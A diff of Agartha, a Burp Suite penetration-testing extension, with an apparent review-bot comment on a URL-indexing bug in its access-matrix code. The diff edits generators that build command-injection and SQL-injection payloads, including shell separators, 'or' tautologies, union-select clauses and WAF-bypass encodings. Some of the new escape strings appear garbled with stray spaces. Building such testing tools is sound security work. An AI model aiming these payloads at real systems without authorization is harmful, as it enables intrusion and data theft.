skipped 15 lines 16 16 except: 17 17 print "==== ERROR ====" + "\n\nFailed to load dependencies.\n" +str(sys.exc_info()[1]) +"\n\n==== ERROR ====\n\n" 18 18 19 - VERSION = "0.9 " 19 + VERSION = "0.92 " 20 20 21 21 class BurpExtender(IBurpExtender, ITab, IMessageEditorController, IContextMenuFactory): 22 22 skipped 123 lines 146 146 return 147 147 self._tbAuthNewUser.setForeground (Color.black) 148 148 149 - if self.userCount == 0: 150 - # header for unauth user 151 - unauthHeader = self._tbAuthHeader.getText().split('\n')[0] + "\n" + self._tbAuthHeader.getText().split('\n')[1] 152 - for line in self._tbAuthHeader.getText().split('\n')[2:]: 153 - if not any(re.findall(r'cookie|token|auth', line, re.IGNORECASE)): 154 - unauthHeader += "\n" + line 155 - if not line: 156 - break 157 - self.userNamesHttpReq[0] = unauthHeader 158 - 159 - self.userCount = self.userCount + 1 160 - self.userNames.append(self._tbAuthNewUser.text) 161 - self.userNamesHttpReq.append(self._tbAuthHeader.getText()) 162 - self.tableMatrix_DM.addColumn(self._tbAuthNewUser.text) 163 - self.userNamesHttpUrls.append([]) 164 - 165 149 urlList = [] 166 - for x in range(0,self.tableMatrix.getRowCount()): 150 + for x in range(0, self.tableMatrix.getRowCount()): 167 151 urlList.append(str(self.tableMatrix.getValueAt(x, 0))) 168 - 169 152 for _url in set(self._tbAuthURL.getText().split('\n')): 170 153 _url = _url.strip() 171 - if _url and not any(re.findall(r'(log|sign).*(off|out)', _url, re.IGNORECASE)): 154 + _ext = os.path.splitext(urlparse.urlparse(_url).path)[1] 155 + if _url and not any(re.findall(r'(log|sign).*(off|out)', _url, re.IGNORECASE)) and not any(re.findall(r'^\.(gif|jpg|jpeg|png|css|js|ico|svg|eot|woff|woff2|ttf)$', _ext, re.IGNORECASE)): 172 156 # ignore logout, signoff, etc. 
paths 173 157 if _url not in self.userNamesHttpUrls[self.userCount]: 174 158 # check first if the url exist in user's url list skipped 2 lines 177 161 # check table if url exists 178 162 self.tableMatrix_DM.addRow([_url]) 179 163 180 - self._tbAuthURL.setText("") 181 - self._btnAuthRun.setEnabled(True) 182 - self._btnAuthReset.setEnabled(True) 183 - self._lblAuthNotification.text = self._tbAuthNewUser.text + " added successfully!" 184 - self._lblAuthNotification.setForeground (Color.black) 185 - self._cbAuthColoring.setEnabled(True) 186 - self._cbAuthGETPOST.setEnabled(True) 187 - self.tableMatrix.repaint() 188 - self.tableMatrix.setSelectionForeground(Color.red) 189 - self._customRenderer = UserEnabledRenderer(self.tableMatrix.getDefaultRenderer(str), self.userNamesHttpUrls) 190 - self._customTableColumnModel = self.tableMatrix.getColumnModel() 191 - for y in range(0,self.tableMatrix.getColumnCount()): 192 - self._customTableColumnModel.getColumn (y).setCellRenderer (self._customRenderer) 164 + 165 + if self.tableMatrix_DM.getRowCount() > 0: 166 + if self.userCount == 0: 167 + # header for unauth user 168 + unauthHeader = self._tbAuthHeader.getText().split('\n')[0] + "\n" + self._tbAuthHeader.getText().split('\n')[1] 169 + for line in self._tbAuthHeader.getText().split('\n')[2:]: 170 + if not any(re.findall(r'cookie|token|auth', line, re.IGNORECASE)): 171 + unauthHeader += "\n" + line 172 + if not line: 173 + break 174 + self.userNamesHttpReq[0] = unauthHeader 175 + 176 + self.userCount = self.userCount + 1 177 + self.userNames.append(self._tbAuthNewUser.text) 178 + self.userNamesHttpReq.append(self._tbAuthHeader.getText()) 179 + self.tableMatrix_DM.addColumn(self._tbAuthNewUser.text) 180 + self.userNamesHttpUrls.append([]) 193 181 182 + self._tbAuthURL.setText("") 183 + self._btnAuthRun.setEnabled(True) 184 + self._btnAuthReset.setEnabled(True) 185 + self._lblAuthNotification.text = self._tbAuthNewUser.text + " added successfully! 
Possible session terminator (log|sign.*off|out) URLs, and file extensions (gif, jpg, jpeg, png, css, js, ico, svg, eot, woff, woff2, ttf) have been filtered out!" 186 + self._lblAuthNotification.setForeground (Color.black) 187 + self._cbAuthColoring.setEnabled(True) 188 + self._cbAuthGETPOST.setEnabled(True) 189 + self.tableMatrix.repaint() 190 + self.tableMatrix.setSelectionForeground(Color.red) 191 + self._customRenderer = UserEnabledRenderer(self.tableMatrix.getDefaultRenderer(str), self.userNamesHttpUrls) 192 + self._customTableColumnModel = self.tableMatrix.getColumnModel() 193 + for y in range(0,self.tableMatrix.getColumnCount()): 194 + self._customTableColumnModel.getColumn (y).setCellRenderer (self._customRenderer) 195 + else: 196 + self._lblAuthNotification.text = "URL list possibly contains session terminators (log|sign.*off|out), or any of file extensions (gif, jpg, jpeg, png, css, js, ico, svg, eot, woff, woff2, ttf)!" 197 + self._lblAuthNotification.setForeground (Color.red) 194 198 return 195 199 196 200 def _cbAuthColoringFunc(self, ev): skipped 83 lines 280 284 281 285 def funcCommandInj(self, ev): 282 286 listCommandInj = [] 283 - prefixes = ["", "\\n", "\\r\\n", "%0a", "%0d%0a"] 284 - escapeChars = ["", "'", "\\'", "\"", "\\\""] 287 + prefixes = ["", "\\n", "\\\ \ n " , " \ \ r\ \ n " , " \ \ \ \ r \ \ \\n", "%0a", "%0d%0a"] 288 + escapeChars = ["", "'", "\\'", "\\ \ \ ' " , " \ "", "\ \ \ " " , " \ \ \\\""] 285 289 separators = ["&", "&&", "|", "||", ";"] 286 290 287 291 for prefix in prefixes: 288 292 for separator in separators: 289 293 for escapeChar in escapeChars: 294 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 295 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 296 + continue 290 297 listCommandInj.append(prefix + escapeChar + separator + self._txtTargetPath.text + separator + escapeChar + "\n") 291 298 listCommandInj.append(prefix + escapeChar + separator + self._txtTargetPath.text + escapeChar + "\n") 292 
299 listCommandInj.append(prefix + escapeChar + separator + escapeChar + self._txtTargetPath.text + "\n") skipped 110 lines 403 410 return 404 411 405 412 listSQLi = [] 406 - prefixes = ["", "\\n", "\\r\\n", "%0a", "0x0a", "%0d%0a", "0x0d0a", "%00", "0x00"] 407 - escapeChars = ["", "'", "\\'"] 413 + prefixes = ["", "\\n", "\\\ \ n " , " \ \ r\ \ n " , " \ \ \ \ r \ \ \\n", "%0a", "0x0a", "%0d%0a", "0x0d0a", "%00", "0x00"] 414 + escapeChars = ["", "'", "\\'", " \ \ \ \ ' " ] 408 415 if not self._cbSqlWafBypass.isSelected(): 409 416 prefixes = [""] 410 417 escapeChars = ["", "'"] 411 - 412 418 n1 = str(random.randint(10, 70)) 413 419 n2 = str(random.randint(71, 99)) 414 420 boolExpressions = [n1 + "=" + n1, n1 + "<" + n2] skipped 5 lines 420 426 for escapeChar in escapeChars: 421 427 for boolExpression in boolExpressions: 422 428 for suffix in suffixes[1:]: 429 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 430 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 431 + continue 423 432 listSQLi.append(prefix + escapeChar + " or " + boolExpression + suffix + "\n") 424 433 if not escapeChar: 425 434 listSQLi.append(prefix + " or " + boolExpression + "\n") 426 435 for prefix in prefixes: 427 436 for escapeChar in escapeChars[1:]: 428 437 for suffix in suffixes[1:]: 438 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 439 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 440 + continue 429 441 listSQLi.append(prefix + escapeChar + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + "\n") 430 442 listSQLi.append(prefix + escapeChar + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + escapeChar + suffix + "\n") 431 443 listSQLi.append(prefix + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + escapeChar + "\n") 432 444 listSQLi.append(prefix + " or " + escapeChar + "xyz" + escapeChar + "=" + escapeChar + "xyz" + escapeChar + suffix + "\n") 433 - 434 445 435 446 if 
self._cbOrderBased.isSelected(): 436 447 for prefix in prefixes: 437 448 for escapeChar in escapeChars: 438 449 for suffix in suffixes[1:]: 439 450 for i in range(int(self._cbOrderDepth.getSelectedItem())): 451 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 452 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 453 + continue 440 454 listSQLi.append(prefix + escapeChar + " order by " + str(i+1) + suffix + "\n") 441 455 if not escapeChar: 442 456 listSQLi.append(prefix + escapeChar + " order by " + str(i+1) + "\n") skipped 4 lines 447 461 for escapeChar in escapeChars: 448 462 for suffix in suffixes[1:]: 449 463 for union in unions: 464 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 465 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 466 + continue 450 467 unionPhrase = " union all select " 451 468 for i in range(int(self._cbUnionDepth.getSelectedItem())): 452 469 unionPhrase += union skipped 65 lines 518 535 for prefix in prefixes: 519 536 for escapeChar in escapeChars: 520 537 for suffix in suffixes[1:]: 538 + if (prefix[:2].count("\\")) and (escapeChar[:2].count("\\")): 539 + if (prefix[:2].count("\\") != escapeChar[:2].count("\\")): 540 + continue 521 541 if self._cbOracleBased.isSelected(): 522 542 if self._cbStackedSQL.isSelected(): 523 543 if escapeChar: skipped 328 lines 852 872 self.editorPaneInfo.setContentType("text/html"); 853 873 htmlString ="<html>" 854 874 htmlString +="<div><h3>Author: Volkan Dindar, Github Repo: https://github.com/volkandindar/agartha</h3>" 855 - htmlString +="<h1>Agartha { LFI | RCE | Auth | SQL Injection | Http->Js }</h1>" 875 + htmlString +="<h1>Agartha { LFI | RCE | SQLi | Auth | Http->Js }</h1>" 856 876 htmlString +="<p>Agartha is a penetration testing tool which creates dynamic payload lists and user access matrix to reveal injection flaws and authentication/authorization issues. 
There are many different attack payloads alredy exist, but Agartha creates run-time, systematic and vendor-neutral payloads with many different possibilities and bypassing methods. It also draws attention to user session and URL relationships, which makes easy to find user access violations. And additionally, it converts Http requests to JavaScript to help digging up XSS issues more. In summary:</p><ul>" 857 877 htmlString +="<li><strong>Payload Generator</strong>: It creates payloads/wordlists for different attack types.<ul>" 858 878 htmlString +="<li><strong>Local File Inclusion, Directory Traversal</strong>: It creates file dictionary lists with various encoding and escaping characters.</li>" skipped 224 lines 1083 1103 self._requestViewer.setMessage("", False) 1084 1104 self._responseViewer.setMessage("", False) 1085 1105 self._lblAuthNotification.text = "Please add users to create an auth matrix" 1106 + self._lblAuthNotification.setForeground (Color.black) 1086 1107 self._tbAuthNewUser.setForeground (Color.black) 1087 1108 self._txtHeaderDefault = "GET /example HTTP/1.1\nHost: localhost.com\nAccept-Encoding: gzip,deflate\nConnection: close\nCookie: SessionID=......" 1088 1109 self._tbAuthHeader.setText(self._txtHeaderDefault) skipped 97 lines
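Review bot: In the reordered add-user block, the URL loop at new line 157 still indexes `self.userNamesHttpUrls[self.userCount]`, but `self.userCount = self.userCount + 1` and `self.userNamesHttpUrls.append([])` now run only after the loop (new lines 176–180), so if the elided lines 159–160 append `_url` to that list as the old ordering implied, the new user's URLs land in the previous user's list (index 0, the unauthenticated entry, on the first add) and the freshly appended list stays empty — the `UserEnabledRenderer` that receives `self.userNamesHttpUrls` would then attribute URLs to the wrong session in the access matrix. Collect the survivors locally instead: `_newUrls = []` before the loop, `if _url not in _newUrls:` (with the append targeting `_newUrls`), and `self.userNamesHttpUrls.append(_newUrls)` in place of `self.userNamesHttpUrls.append([])`. That also lets the guard become `if _newUrls:` rather than `if self.tableMatrix_DM.getRowCount() > 0`, which currently takes the "added successfully" path for a second user whose entire list was filtered because earlier users already populated the table. Separately, `(log|sign).*(off|out)` is matched against the whole URL and silently drops paths such as `/catalog/outlet` or `/blog/layout`; anchoring it to a path segment, or listing the dropped URLs in the notification, would avoid hidden gaps in the authorization matrix. The enclosing method begins above this hunk and the proposed fix depends on the two elided lines.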